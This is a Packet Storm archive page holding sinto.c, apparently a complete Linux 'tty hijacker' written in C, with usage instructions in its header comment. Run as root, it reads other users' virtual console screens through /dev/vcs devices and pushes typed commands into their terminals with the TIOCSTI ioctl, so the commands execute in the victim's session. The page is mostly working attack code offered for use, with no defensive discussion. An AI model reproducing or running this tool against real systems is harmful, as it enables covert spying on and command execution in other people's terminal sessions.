Sinto.c is an interactive tty hijacker for Linux.
2545a9c0855c78b989ac5e2761936838dd95a63705a98662686aeed743282260/*
* code by vecna@s0ftpj.org - www.s0ftpj.org
*
* how this code run:
* i read input and parse first char, if don't compare with "h" "r" "i",
* sinto think that you have insert tty code. it open /dev/vcsX and print
* it on * terminal, /dev/vcsX, as read under kernel documentation
* (devices.txt):
*
* 7 char Virtual console capture devices
* 0 = /dev/vcs Current vc text contents
* 1 = /dev/vcs1 tty1 text contents
* ...
* 63 = /dev/vcs63 tty63 text contents
* 128 = /dev/vcsa Current vc text/attribute contents
*
* with 'h' is printed number of current vcs.
*
* after reading from input info about tty, if is digit 'i' sinto entering
* on insert mode, where you can insert command to send and execute on
* hijacked tty after injection i've put refresh after 1000 milliseconds (if
* operation is more long, type 'r' for refresh)
*
* sorry for my bad english, I speak only with my fish and my plants.
*
* for compile gcc -o sinto -Wall -O6 sinto.c / run as root.
*
* tnx to betatester TheDuke Velenux ralph vejeta.
*
* example of usage:
./sinto
1
(start to read other tty, tty1 on example)
i
(entering on insert command mode)
"command"
(after 1000 milliseconds there are refresh)
r
(make other refresh with 'r')
h
(type vcs where we are to work)
^C
(quit)
* bye :)
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <termios.h>
#define VCS_NAME_LEN 16
#define CMD_SIZE 128
#define VCS_to_TTY(a) a[5] ='t'; \
a[6] ='t'; \
a[7] ='y';
#define TTY_to_VCS(a) a[5] ='v'; \
a[6] ='c'; \
a[7] ='s';
extern int errno;
void S_error(char *, ...);
int open_vcs(char[3], char *);
void read_vcs(int);
void read_command(char vcs[]);
void exec_hijacking(char *, char *);
int main(void)
{
char terminal[3]={ '1', 0x00, 0x00 };
char *vcs_name =malloc(VCS_NAME_LEN);
if(geteuid())
S_error("required root for read other /dev/vcs");
printf("entering on interactive hijacking mode\n");
while(1)
{
char rcvd, suffix[3]={ 0x00, 0x00, 0x00 };
int vcsfd =0, index =0;
while(read(STDIN_FILENO, &rcvd, sizeof(char)) > 0)
{
if(rcvd == '\n')
break;
suffix[index++] =rcvd;
if(index == 2)
break;
}
switch(suffix[0])
{
case '\n':
break;
case 'h':
printf("\nwe are on %s\n", vcs_name);
break;
case 'i':
if(vcs_name !=NULL)
read_command(vcs_name);
memcpy(&suffix, &terminal, 3);
case 'r': /* refresh */
memcpy(&suffix, &terminal, 3);
default:
vcsfd =open_vcs(suffix, vcs_name);
switch(vcsfd)
{
case -1:
S_error("open %s", vcs_name);
break;
case -2:
vcsfd =70;
while(vcsfd--)
printf("\n");
printf("\nis your tty!\n");
break;
default:
memcpy(&terminal, &suffix, 3);
read_vcs(vcsfd);
close(vcsfd);
}
}
}
}
int open_vcs(char tty[3], char *vcs_name)
{
char buf[VCS_NAME_LEN];
snprintf(buf, VCS_NAME_LEN, "%s%s", "/dev/vcs", tty);
memcpy((void *)vcs_name, (void *) &buf, VCS_NAME_LEN);
VCS_to_TTY(vcs_name);
if(!strcmp(vcs_name, ttyname(STDIN_FILENO)))
return (-2);
TTY_to_VCS(vcs_name);
/* -2 is signal of opening equal tty */
return open(buf, O_RDONLY);
}
void read_vcs(int vcsfd)
{
int nbyte;
char screen_buf[2000]; /* my strace tell me 2000 :) */
nbyte =read(vcsfd, screen_buf, sizeof(screen_buf));
if(nbyte == -1)
S_error(0, "error on read %d:%s",vcsfd, ttyname(vcsfd));
write(STDOUT_FILENO, screen_buf, nbyte -1);
}
void read_command(char vcs[])
{
char command[128];
printf("\033[1;34minsert command: \033[0m");
fgets(command, 128, stdin);
if(command[0] != '\n')
exec_hijacking(command, vcs);
}
void exec_hijacking(char *command, char *vcs)
{
/* this is some tech used on dirthy.c - TESO team */
int fd;
struct termios save_termios, buf;
VCS_to_TTY(vcs);
if((fd = open(vcs, O_WRONLY)) < 0)
S_error("open %s", vcs);
if(tcgetattr(STDIN_FILENO, &save_termios) < 0)
S_error("tcgetattr");
buf = save_termios;
buf.c_lflag &= ~(ECHO | ICANON);
buf.c_cc[VMIN] = 1;
buf.c_cc[VTIME] = 0;
if (tcsetattr(fd, TCSAFLUSH, &buf) <0)
S_error("tcsetattr for hijacking");
while(*command)
{
char part[2] ={ *command++, 0x00 };
if(ioctl(fd, TIOCSTI, part) == -1)
S_error("ioctl on sending command");
}
usleep(1000);
if (tcsetattr(fd, TCSAFLUSH, &save_termios) < 0)
S_error("tcsetattr for reset, type \"reset\"");
TTY_to_VCS(vcs);
}
void S_error(char *message, ...)
{
va_list va;
va_start(va, message);
if(errno)
{
vfprintf(stderr, message, va);
fprintf(stderr," : %s\n", strerror(errno));
}
else
{
vfprintf(stderr, message, va);
fprintf(stderr, "\n");
}
va_end(va);
exit(errno);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed